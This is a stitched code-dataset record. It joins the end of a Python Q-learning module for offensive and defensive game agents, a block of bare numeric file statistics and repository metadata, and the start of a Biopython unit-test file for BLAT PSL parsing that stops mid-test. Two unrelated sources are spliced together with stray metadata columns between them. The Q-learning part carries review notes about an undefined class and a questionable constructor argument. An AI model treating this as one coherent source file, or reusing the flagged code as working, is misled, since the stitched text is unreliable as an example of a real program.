                        agent_off.Q.update(state, action_off, next_state, reward_off, actions)
                    # Remember the defensive agent's transition for its next backup.
                    last_inter_state = intermediate_state[:]
                    self.logger.debug(f"Offensive: state:{state}, action:{action_off}, reward:{reward_off}, next_state: {intermediate_state}")
                    self.logger.debug(f"Defensive: state:{intermediate_state}, action:{action_def}, reward:{reward_def}, next_state: {next_state}")
                    self.logger.debug(f"Offensive Q sum: {agent_off.Q.sum()}, Defensive Q sum: {agent_def.Q.sum()}")
                    state = next_state[:]
            # Decay exploration, floored at min_epsilon, then start a new game.
            self.epsilon = max(self.min_epsilon, self.epsilon*self.epsilon_decay)
            self.env.reset()
            # Record current Q sum
            offensive_Q_list[e] = agent_off.Q.sum()
            defensive_Q_list[e] = agent_def.Q.sum()
            Q_list[e] = offensive_Q_list[e] + defensive_Q_list[e]
        # Merge both agents' tables and persist everything.
        trained_Q = agent_off.Q + agent_def.Q
        with open(self.Q_file, "wb") as f:
            pickle.dump(trained_Q, f)
        with open("Q/offensive_Q_sum.json", "w") as f:
            json.dump(offensive_Q_list, f)
        with open("Q/defensive_Q_sum.json", "w") as f:
            json.dump(defensive_Q_list, f)
        with open("Q/Q_sum.json", "w") as f:
            json.dump(Q_list, f)
        self.logger.info(f"Offensive wins for {offensive_win} times, defensive wins for {defensive_win} times, ties for {tie_count} times")
class DoubleQLearning(DoubleTDAgent):
    """Double Q-learning: two Q tables, one updated and one used for the
    action-value estimate, chosen by a fair coin flip each backup.
    """

    def __init__(self, new=False):
        super().__init__(new)
        self.Q1 = self.Q
        # NOTE(review): `Q` is not defined in this module's visible imports —
        # confirm where the second table's class comes from.
        self.Q2 = Q()

    def update_Q(self, state, action, reward, next_state):
        """One double-Q backup for (state, action, reward, next_state).

        BUG FIX: the previous revision called `random.rand()`, which does not
        exist in the stdlib `random` module (that is numpy's API) and raised
        AttributeError; `random.random()` is the correct uniform-[0,1) draw.
        """
        rnd = random.random()
        next_actions = self.env.actions(next_state)
        # Coin flip decides which table is updated and which supplies the
        # greedy estimate for the target.
        if rnd >= 0.5:
            update_Q, action_Q = self.Q1, self.Q2
        else:
            update_Q, action_Q = self.Q2, self.Q1
        # Greedy action value from the *other* table (assumes next_actions
        # is non-empty, as in the original).
        max_nQ = max(action_Q[(next_state, a)] for a in next_actions)
        target = reward + self.gamma * max_nQ
        return self.double_update(state, action, target, update_Q)
class QLearningET(QLearning):
    """ This is the Q learning with Eligibility Trace """
    # Placeholder: behaves exactly like QLearning until the eligibility-trace
    # update is implemented.
    pass
class NStepQLearning(QLearning):
    """n-step Q-learning agent.

    The previous revision duplicated `QLearning.train` byte-for-byte; that
    redundant override is removed here — inheritance provides the identical
    behavior, and the n-step-specific training loop can be added when it
    actually diverges from the parent's.
    """

    def __init__(self, game_name):
        # NOTE(review): QLearning.__init__ takes `new=False`, so `game_name`
        # is forwarded into that slot exactly as before — TODO confirm this
        # is the intended argument.
        super().__init__(game_name)
#class EligibilityTraceSARSA:
# def __init__(self):
# pass
#
# def train(self):
# state =
#
| 43.809955
| 143
| 0.588928
| 1,237
| 9,682
| 4.34034
| 0.107518
| 0.041907
| 0.020115
| 0.020861
| 0.845595
| 0.8225
| 0.791209
| 0.791209
| 0.791209
| 0.763271
| 0
| 0.00542
| 0.313985
| 9,682
| 220
| 144
| 44.009091
| 0.802921
| 0.062074
| 0
| 0.725714
| 0
| 0.022857
| 0.105292
| 0.015689
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0.005714
| 0.051429
| 0.005714
| 0.148571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92c06ed141465bb3176537e7576edf7f1976c3ce
| 55,400
|
py
|
Python
|
Tests/test_SearchIO_blat_psl.py
|
adamnovak/biopython
|
92772dd6add33e0b87ab593841f924f0f6f16090
|
[
"PostgreSQL"
] | 2
|
2020-08-27T08:45:14.000Z
|
2020-11-14T02:15:32.000Z
|
Tests/test_SearchIO_blat_psl.py
|
adamnovak/biopython
|
92772dd6add33e0b87ab593841f924f0f6f16090
|
[
"PostgreSQL"
] | null | null | null |
Tests/test_SearchIO_blat_psl.py
|
adamnovak/biopython
|
92772dd6add33e0b87ab593841f924f0f6f16090
|
[
"PostgreSQL"
] | null | null | null |
# Copyright 2012 by Wibowo Arindrarto. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for SearchIO BlatIO parsers."""
import os
import unittest
from Bio import BiopythonExperimentalWarning
import warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', BiopythonExperimentalWarning)
from Bio.SearchIO import parse
# test case files are in the Blat directory
TEST_DIR = 'Blat'
FMT = 'blat-psl'
def get_file(filename):
    """Return the full path of *filename* inside the test data directory."""
    path = os.path.join(TEST_DIR, filename)
    return path
class BlatPslCases(unittest.TestCase):
    def test_psl_34_001(self, testf='psl_34_001.psl', pslx=False):
        """Test parsing blat output (psl_34_001.psl).

        Verifies two query results ('hg18_dna' with 3 hits, 'hg19_dna'
        with 10 hits of which the first five are checked), asserting the
        raw PSL column values on each HSP: match/mismatch/N counts, gap
        open and gap base counts, strand, start/end coordinates, and the
        per-fragment span/range lists.
        """
        blat_file = get_file(testf)
        self.qresults = list(parse(blat_file, FMT, pslx=pslx))
        self.assertEqual(2, len(self.qresults))
        # check common attributes
        # (every hit/HSP must carry the IDs of its parent query and hit)
        for qresult in self.qresults:
            for hit in qresult:
                self.assertEqual(qresult.id, hit.query_id)
                for hsp in hit:
                    self.assertEqual(hit.id, hsp.hit_id)
                    self.assertEqual(qresult.id, hsp.query_id)
        # test first qresult
        qresult = self.qresults[0]
        self.assertEqual('hg18_dna', qresult.id)
        self.assertEqual('blat', qresult.program)
        self.assertEqual(33, qresult.seq_len)
        self.assertEqual(3, len(qresult))
        # first qresult, first hit
        hit = qresult[0]
        self.assertEqual('chr4', hit.id)
        self.assertEqual(191154276, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, first hit, first hsp
        hsp = qresult[0].hsps[0]
        self.assertEqual(16, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(11, hsp.query_start)
        self.assertEqual(61646095, hsp.hit_start)
        self.assertEqual(27, hsp.query_end)
        self.assertEqual(61646111, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([16], hsp.query_span_all)
        self.assertEqual([16], hsp.hit_span_all)
        self.assertEqual([(11, 27)], hsp.query_range_all)
        self.assertEqual([(61646095, 61646111)], hsp.hit_range_all)
        # first qresult, second hit
        hit = qresult[1]
        self.assertEqual('chr1', hit.id)
        self.assertEqual(249250621, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, second hit, first hsp
        hsp = qresult[1].hsps[0]
        self.assertEqual(33, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(0, hsp.query_start)
        self.assertEqual(10271783, hsp.hit_start)
        self.assertEqual(33, hsp.query_end)
        self.assertEqual(10271816, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([33], hsp.query_span_all)
        self.assertEqual([33], hsp.hit_span_all)
        self.assertEqual([(0, 33)], hsp.query_range_all)
        self.assertEqual([(10271783, 10271816)], hsp.hit_range_all)
        # first qresult, third hit
        hit = qresult[2]
        self.assertEqual('chr2', hit.id)
        self.assertEqual(243199373, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, third hit, first hsp
        hsp = qresult[2].hsps[0]
        self.assertEqual(17, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        # negative strand alignment
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(8, hsp.query_start)
        self.assertEqual(53575980, hsp.hit_start)
        self.assertEqual(25, hsp.query_end)
        self.assertEqual(53575997, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([17], hsp.query_span_all)
        self.assertEqual([17], hsp.hit_span_all)
        self.assertEqual([(8, 25)], hsp.query_range_all)
        self.assertEqual([(53575980, 53575997)], hsp.hit_range_all)
        # test second qresult
        qresult = self.qresults[1]
        self.assertEqual('hg19_dna', qresult.id)
        self.assertEqual('blat', qresult.program)
        self.assertEqual(50, qresult.seq_len)
        self.assertEqual(10, len(qresult))
        # second qresult, first hit
        hit = qresult[0]
        self.assertEqual('chr9', hit.id)
        self.assertEqual(141213431, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # second qresult, first hit, first hsp
        hsp = qresult[0].hsps[0]
        self.assertEqual(38, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(3, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(9, hsp.query_start)
        self.assertEqual(85737865, hsp.hit_start)
        self.assertEqual(50, hsp.query_end)
        self.assertEqual(85737906, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([41], hsp.query_span_all)
        self.assertEqual([41], hsp.hit_span_all)
        self.assertEqual([(9, 50)], hsp.query_range_all)
        self.assertEqual([(85737865, 85737906)], hsp.hit_range_all)
        # second qresult, second hit
        hit = qresult[1]
        self.assertEqual('chr8', hit.id)
        self.assertEqual(146364022, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # second qresult, second hit, first hsp
        hsp = qresult[1].hsps[0]
        self.assertEqual(41, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(8, hsp.query_start)
        self.assertEqual(95160479, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(95160520, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([41], hsp.query_span_all)
        self.assertEqual([41], hsp.hit_span_all)
        self.assertEqual([(8, 49)], hsp.query_range_all)
        self.assertEqual([(95160479, 95160520)], hsp.hit_range_all)
        # second qresult, third hit
        hit = qresult[2]
        self.assertEqual('chr22', hit.id)
        self.assertEqual(51304566, hit.seq_len)
        self.assertEqual(2, len(hit.hsps))
        # second qresult, third hit, first hsp
        hsp = qresult[2].hsps[0]
        self.assertEqual(33, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(3, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(11, hsp.query_start)
        self.assertEqual(42144400, hsp.hit_start)
        self.assertEqual(47, hsp.query_end)
        self.assertEqual(42144436, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([36], hsp.query_span_all)
        self.assertEqual([36], hsp.hit_span_all)
        self.assertEqual([(11, 47)], hsp.query_range_all)
        self.assertEqual([(42144400, 42144436)], hsp.hit_range_all)
        # second qresult, third hit, second hsp
        hsp = qresult[2].hsps[1]
        self.assertEqual(35, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(2, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(12, hsp.query_start)
        self.assertEqual(48997405, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(48997442, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([37], hsp.query_span_all)
        self.assertEqual([37], hsp.hit_span_all)
        self.assertEqual([(12, 49)], hsp.query_range_all)
        self.assertEqual([(48997405, 48997442)], hsp.hit_range_all)
        # second qresult, fourth hit
        hit = qresult[3]
        self.assertEqual('chr2', hit.id)
        self.assertEqual(243199373, hit.seq_len)
        self.assertEqual(2, len(hit.hsps))
        # second qresult, fourth hit, first hsp
        # (two-fragment alignment: one query gap open spanning 4 bases)
        hsp = qresult[3].hsps[0]
        self.assertEqual(43, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(1, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(1, hsp.query_gapopen_num)
        self.assertEqual(4, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(1, hsp.query_start)
        self.assertEqual(183925984, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(183926028, hsp.hit_end)
        self.assertEqual(2, len(hsp))
        self.assertEqual([6, 38], hsp.query_span_all)
        self.assertEqual([6, 38], hsp.hit_span_all)
        self.assertEqual([(1, 7), (11, 49)], hsp.query_range_all)
        self.assertEqual([(183925984, 183925990), (183925990, 183926028)], hsp.hit_range_all)
        # second qresult, fourth hit, second hsp
        hsp = qresult[3].hsps[1]
        self.assertEqual(35, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(1, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(13, hsp.query_start)
        self.assertEqual(120641740, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(120641776, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([36], hsp.query_span_all)
        self.assertEqual([36], hsp.hit_span_all)
        self.assertEqual([(13, 49)], hsp.query_range_all)
        self.assertEqual([(120641740, 120641776)], hsp.hit_range_all)
        # second qresult, fifth hit
        hit = qresult[4]
        self.assertEqual('chr19', hit.id)
        self.assertEqual(59128983, hit.seq_len)
        self.assertEqual(3, len(hit.hsps))
        # second qresult, fifth hit, first hsp
        # (two-fragment alignment: one hit gap open spanning 134 bases)
        hsp = qresult[4].hsps[0]
        self.assertEqual(34, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(2, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(1, hsp.hit_gapopen_num)
        self.assertEqual(134, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(10, hsp.query_start)
        self.assertEqual(35483340, hsp.hit_start)
        self.assertEqual(46, hsp.query_end)
        self.assertEqual(35483510, hsp.hit_end)
        self.assertEqual(2, len(hsp))
        self.assertEqual([25, 11], hsp.query_span_all)
        self.assertEqual([25, 11], hsp.hit_span_all)
        self.assertEqual([(10, 35), (35, 46)], hsp.query_range_all)
        self.assertEqual([(35483340, 35483365), (35483499, 35483510)], hsp.hit_range_all)
        # second qresult, fifth hit, second hsp
        hsp = qresult[4].hsps[1]
        self.assertEqual(39, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(10, hsp.query_start)
        self.assertEqual(54017130, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(54017169, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([39], hsp.query_span_all)
        self.assertEqual([39], hsp.hit_span_all)
        self.assertEqual([(10, 49)], hsp.query_range_all)
        self.assertEqual([(54017130, 54017169)], hsp.hit_range_all)
        # second qresult, fifth hit, third hsp
        hsp = qresult[4].hsps[2]
        self.assertEqual(36, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(3, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(10, hsp.query_start)
        self.assertEqual(553742, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(553781, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([39], hsp.query_span_all)
        self.assertEqual([39], hsp.hit_span_all)
        self.assertEqual([(10, 49)], hsp.query_range_all)
        self.assertEqual([(553742, 553781)], hsp.hit_range_all)
    def test_psl_34_002(self, testf='psl_34_002.psl', pslx=False):
        """Test parsing blat output (psl_34_002.psl)."""
        # This file yields no query results; the parser must produce an
        # empty iterator rather than raising.
        blat_file = get_file(testf)
        self.qresults = list(parse(blat_file, FMT, pslx=pslx))
        self.assertEqual(0, len(self.qresults))
    def test_psl_34_003(self, testf='psl_34_003.psl', pslx=False):
        """Test parsing blat output (psl_34_003.psl).

        Verifies a single query result ('hg18_dna') with three
        single-HSP hits, asserting the raw PSL column values on each
        HSP (match counts, gap stats, strand, coordinates, span/range
        lists).
        """
        blat_file = get_file(testf)
        self.qresults = list(parse(blat_file, FMT, pslx=pslx))
        self.assertEqual(1, len(self.qresults))
        # check common attributes
        # (every hit/HSP must carry the IDs of its parent query and hit)
        for qresult in self.qresults:
            for hit in qresult:
                self.assertEqual(qresult.id, hit.query_id)
                for hsp in hit:
                    self.assertEqual(hit.id, hsp.hit_id)
                    self.assertEqual(qresult.id, hsp.query_id)
        # test first qresult
        qresult = self.qresults[0]
        self.assertEqual('hg18_dna', qresult.id)
        self.assertEqual('blat', qresult.program)
        self.assertEqual(33, qresult.seq_len)
        self.assertEqual(3, len(qresult))
        # first qresult, first hit
        hit = qresult[0]
        self.assertEqual('chr4', hit.id)
        self.assertEqual(191154276, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, first hit, first hsp
        hsp = qresult[0].hsps[0]
        self.assertEqual(16, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(11, hsp.query_start)
        self.assertEqual(61646095, hsp.hit_start)
        self.assertEqual(27, hsp.query_end)
        self.assertEqual(61646111, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([16], hsp.query_span_all)
        self.assertEqual([16], hsp.hit_span_all)
        self.assertEqual([(11, 27)], hsp.query_range_all)
        self.assertEqual([(61646095, 61646111)], hsp.hit_range_all)
        # first qresult, second hit
        hit = qresult[1]
        self.assertEqual('chr1', hit.id)
        self.assertEqual(249250621, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, second hit, first hsp
        hsp = qresult[1].hsps[0]
        self.assertEqual(33, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(0, hsp.query_start)
        self.assertEqual(10271783, hsp.hit_start)
        self.assertEqual(33, hsp.query_end)
        self.assertEqual(10271816, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([33], hsp.query_span_all)
        self.assertEqual([33], hsp.hit_span_all)
        self.assertEqual([(0, 33)], hsp.query_range_all)
        self.assertEqual([(10271783, 10271816)], hsp.hit_range_all)
        # first qresult, third hit
        hit = qresult[2]
        self.assertEqual('chr2', hit.id)
        self.assertEqual(243199373, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, third hit, first hsp
        hsp = qresult[2].hsps[0]
        self.assertEqual(17, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        # negative strand alignment
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(8, hsp.query_start)
        self.assertEqual(53575980, hsp.hit_start)
        self.assertEqual(25, hsp.query_end)
        self.assertEqual(53575997, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([17], hsp.query_span_all)
        self.assertEqual([17], hsp.hit_span_all)
        self.assertEqual([(8, 25)], hsp.query_range_all)
        self.assertEqual([(53575980, 53575997)], hsp.hit_range_all)
    def test_psl_34_004(self, testf='psl_34_004.psl', pslx=False):
        """Test parsing blat output (psl_34_004.psl).

        Verifies a single query result ('hg19_dna') with 10 hits, the
        first five of which are checked in detail: raw PSL column values
        on each HSP (match counts, gap stats, strand, coordinates, and
        per-fragment span/range lists).
        """
        blat_file = get_file(testf)
        self.qresults = list(parse(blat_file, FMT, pslx=pslx))
        self.assertEqual(1, len(self.qresults))
        # check common attributes
        # (every hit/HSP must carry the IDs of its parent query and hit)
        for qresult in self.qresults:
            for hit in qresult:
                self.assertEqual(qresult.id, hit.query_id)
                for hsp in hit:
                    self.assertEqual(hit.id, hsp.hit_id)
                    self.assertEqual(qresult.id, hsp.query_id)
        # test first qresult
        qresult = self.qresults[0]
        self.assertEqual('hg19_dna', qresult.id)
        self.assertEqual('blat', qresult.program)
        self.assertEqual(50, qresult.seq_len)
        self.assertEqual(10, len(qresult))
        # first qresult, first hit
        hit = qresult[0]
        self.assertEqual('chr9', hit.id)
        self.assertEqual(141213431, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, first hit, first hsp
        hsp = qresult[0].hsps[0]
        self.assertEqual(38, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(3, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(9, hsp.query_start)
        self.assertEqual(85737865, hsp.hit_start)
        self.assertEqual(50, hsp.query_end)
        self.assertEqual(85737906, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([41], hsp.query_span_all)
        self.assertEqual([41], hsp.hit_span_all)
        self.assertEqual([(9, 50)], hsp.query_range_all)
        self.assertEqual([(85737865, 85737906)], hsp.hit_range_all)
        # first qresult, second hit
        hit = qresult[1]
        self.assertEqual('chr8', hit.id)
        self.assertEqual(146364022, hit.seq_len)
        self.assertEqual(1, len(hit.hsps))
        # first qresult, second hit, first hsp
        hsp = qresult[1].hsps[0]
        self.assertEqual(41, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(0, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(8, hsp.query_start)
        self.assertEqual(95160479, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(95160520, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([41], hsp.query_span_all)
        self.assertEqual([41], hsp.hit_span_all)
        self.assertEqual([(8, 49)], hsp.query_range_all)
        self.assertEqual([(95160479, 95160520)], hsp.hit_range_all)
        # first qresult, third hit
        hit = qresult[2]
        self.assertEqual('chr22', hit.id)
        self.assertEqual(51304566, hit.seq_len)
        self.assertEqual(2, len(hit.hsps))
        # first qresult, third hit, first hsp
        hsp = qresult[2].hsps[0]
        self.assertEqual(33, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(3, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(11, hsp.query_start)
        self.assertEqual(42144400, hsp.hit_start)
        self.assertEqual(47, hsp.query_end)
        self.assertEqual(42144436, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([36], hsp.query_span_all)
        self.assertEqual([36], hsp.hit_span_all)
        self.assertEqual([(11, 47)], hsp.query_range_all)
        self.assertEqual([(42144400, 42144436)], hsp.hit_range_all)
        # first qresult, third hit, second hsp
        hsp = qresult[2].hsps[1]
        self.assertEqual(35, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(2, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(12, hsp.query_start)
        self.assertEqual(48997405, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(48997442, hsp.hit_end)
        self.assertEqual(1, len(hsp))
        self.assertEqual([37], hsp.query_span_all)
        self.assertEqual([37], hsp.hit_span_all)
        self.assertEqual([(12, 49)], hsp.query_range_all)
        self.assertEqual([(48997405, 48997442)], hsp.hit_range_all)
        # first qresult, fourth hit
        hit = qresult[3]
        self.assertEqual('chr2', hit.id)
        self.assertEqual(243199373, hit.seq_len)
        self.assertEqual(2, len(hit.hsps))
        # first qresult, fourth hit, first hsp
        # (two-fragment alignment: one query gap open spanning 4 bases)
        hsp = qresult[3].hsps[0]
        self.assertEqual(43, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(1, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(1, hsp.query_gapopen_num)
        self.assertEqual(4, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(1, hsp[0].query_strand)
        self.assertEqual(1, hsp.query_start)
        self.assertEqual(183925984, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(183926028, hsp.hit_end)
        self.assertEqual(2, len(hsp))
        self.assertEqual([6, 38], hsp.query_span_all)
        self.assertEqual([6, 38], hsp.hit_span_all)
        self.assertEqual([(1, 7), (11, 49)], hsp.query_range_all)
        self.assertEqual([(183925984, 183925990), (183925990, 183926028)], hsp.hit_range_all)
        # first qresult, fourth hit, second hsp
        hsp = qresult[3].hsps[1]
        self.assertEqual(35, hsp.match_num)
        self.assertEqual(0, hsp.match_rep_num)
        self.assertEqual(1, hsp.mismatch_num)
        self.assertEqual(0, hsp.n_num)
        self.assertEqual(0, hsp.query_gapopen_num)
        self.assertEqual(0, hsp.query_gap_num)
        self.assertEqual(0, hsp.hit_gapopen_num)
        self.assertEqual(0, hsp.hit_gap_num)
        self.assertEqual(-1, hsp[0].query_strand)
        self.assertEqual(13, hsp.query_start)
        self.assertEqual(120641740, hsp.hit_start)
        self.assertEqual(49, hsp.query_end)
        self.assertEqual(120641776, hsp.hit_end)
        self.assertEqual(1, len(hsp))
